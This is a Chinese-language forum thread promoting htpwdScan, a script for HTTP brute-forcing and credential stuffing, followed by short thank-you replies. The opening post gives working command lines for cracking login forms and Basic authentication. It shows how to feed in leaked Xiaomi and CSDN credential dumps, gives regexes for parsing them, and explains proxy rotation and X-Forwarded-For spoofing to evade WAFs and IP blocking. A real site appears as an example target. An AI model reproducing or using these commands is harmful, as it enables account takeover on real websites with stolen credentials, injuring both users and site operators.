小瑞神 发表于 2015-7-12 20:52:14

一个简单的HTTP暴力破解、撞库攻击脚本

回复下载地址:**** Hidden Message *****
htpwdScan 是一个简单的HTTP暴力破解、撞库攻击脚本. 它的特性:
[*]支持批量校验并导入HTTP代理,低频撞库可以成功攻击大部分网站,绕过大部分防御策略和waf
[*]支持直接导入互联网上泄露的社工库,发起撞库攻击
[*]支持导入超大字典
简单示例
[*]HTTP Basic认证htpwdScan.py -u=http://auth.58.com/ -basic user.txt password.txt导入用户名密码字典即可
[*]表单破解htpwdScan.py -f post2.txt -d user=user.txt passwd=password.txt -err="success\":false"从 post2.txt 导入抓的http包,user和passwd是需要破解的参数,而 user.txt password.txt 是保存了密码的字典文件success":false 是选择的失败标记,标记中若有双引号,请记得用右斜杠 \ 转义
[*]GET参数破解htpwdScan.py -d passwd=password.txt -u="http://xxx.com/index.php?m=login&username=test&passwd=test" -get -err="success\":false"使用-get参数告诉脚本此处是GET请求
[*]撞库攻击htpwdScan.py -f=post.txt -database loginname,passwd=xiaomi.txt -regex="(\S+)\s+(\S+)" -err="用户名或密码错误" -fiphtpwdScan.py -f=post.txt -database passwd,loginname=csdn.net.sql -regex="\S+ # (\S+) # (\S+)" -err="用户名或密码错误" -fip使用小米和csdn库发起撞库攻击。post.txt是抓包的HTTP请求参数-regex设定从文件提取参数的正则表达式,此处需分组,分组的方式是使用括号()小米的数据行格式是 [email protected] xxxxxxx 也即 (用户名)空白字符(密码)(\S+)\s+(\S+) 可指定第一个非空白字符拿去填充loginname,而第二个非空白字符串拿去填充passwdcsdn的数据行格式是zdg # 12344321 # [email protected] . 正则表达式写作\S+ # (\S+) # (\S+)第一个#后面的非空白字符串填充passwd,第二个#后面的非空白字符串填充loginname请注意,参数的顺序是重要的-fip 是启用伪造随机IP
[*]校验HTTP代理htpwdScan.py -f=post.txt -proxylist=proxies.txt -checkproxy -suc="用户名或密码错误"要破解某个网站,批量测试使用代理是否连通目标网站,把HTTP请求保存到post.txt,然后用-suc参数设定连通标记一个简单可行的校验方式是:htpwdScan.py -u=http://www.baidu.com -get -proxylist=available.txt -checkproxy -suc="百度一下"
完整参数说明脚本支持的小功能较多,请耐心阅读以下完整说明。建议多使用 -debug 参数查看HTTP请求是否有问题,没问题再发起真正的破解。usage: htpwdScan.py * An HTTP weak pass scanner. By LiJieJie *optional arguments:-h, --help            显示帮助Target:-u REQUESTURL         设定目标URL, 示例.                        -u="https://www.test.com/login.php"-f REQUESTFILE      从文件导入HTTP请求-https                当从文件导入HTTP请求时,启用https(SSL)-get                  使用GET方法,默认: POST-basic[ ...]      HTTP Basic 暴力破解.                        示例. -basic users.dic pass.dicDictionary:-d Param=DictFile                         为参数设定字典文件,                        支持哈希函数如 md5, md5_16, sha1.                        示例. -d user=users.dic pass=md5(pass.dic)Detect:-no302                无视302跳转, 默认302敏感-err ERR     响应文本的破解失败标记,                        示例. -err "user not exist" "password wrong"-suc SUC     响应文本中的破解成功标记,                        e.g. -suc "welcome," "admin"-herr HERR            响应HTTP头的破解失败标记-hsuc HSUC            响应HTTP头的破解成功标记-rtxt RetryText       响应文本中的重试标记,出现则重试请求,                        示例. -rtxt="IP blocked"-rntxt RetryNoText    响应文本中的重试标记,未出现则重试请求,                        示例. -rntxt="<body>"-rheader RetryHeader响应头中的重试标记,出现则重试请求,                        示例. -rheader="Set-Cookie:"-rnheader RetryNoHeader                        响应头中的重试标记,未出现则重试请求,                        示例. -rheader="HTTP/1.1 200 OK"Proxy and spoof:-proxy Server:Port    设定少量HTTP代理                        示例. -proxy=127.0.0.1:8000,8.8.8.8:8000-proxylist ProxyListFile                        从文件批量导入HTTP代理,                        示例. -proxylist=proxys.txt-checkproxy         检查代理服务器的可用性.                        可用代理输出到 001.proxy.servers.txt-fip                  生成随机X-Forwarded-For欺骗源IP-fsid FSID            生成随机session ID. 示例. -fsid PHPSESSID-sleep SECONDS      每次HTTP结束,等待SECONDS秒,                        避免IP被临时屏蔽,进入黑名单Database attack:-database DATABASE    导入社工库中的数据.                        示例. -database user,pass=csdn.txt-regex REGEX          从社工库中提取数据的正则表达式,必须分组.                        示例. -regex="(\S+)\s+(\S+)"General:-t THREADS            工作线程数,默认50-o OUTPUT             输出文件.默认: 000.Cracked.Passwords.txt-debug                进入debug模式检查HTTP请求和HTTP响应-nov                  只显示破解成功的条目,不显示进度-v                  show program's version number and exi

admin888 发表于 2015-7-12 22:14:08

支持支持啊

a1540948917 发表于 2015-7-13 13:12:50

回复下载看看

格式化、、》 发表于 2015-7-15 00:27:23


不管东西咋样 还是先谢谢了

阿涛网络 发表于 2015-7-19 11:40:10

看看怎么用的支持啦

sunflower 发表于 2017-1-9 02:00:30

一个简单的HTTP暴力破解、撞库攻击脚本

寓言 发表于 2017-8-9 21:31:13

HTTP暴力破解
页: [1]
查看完整版本: 一个简单的HTTP暴力破解、撞库攻击脚本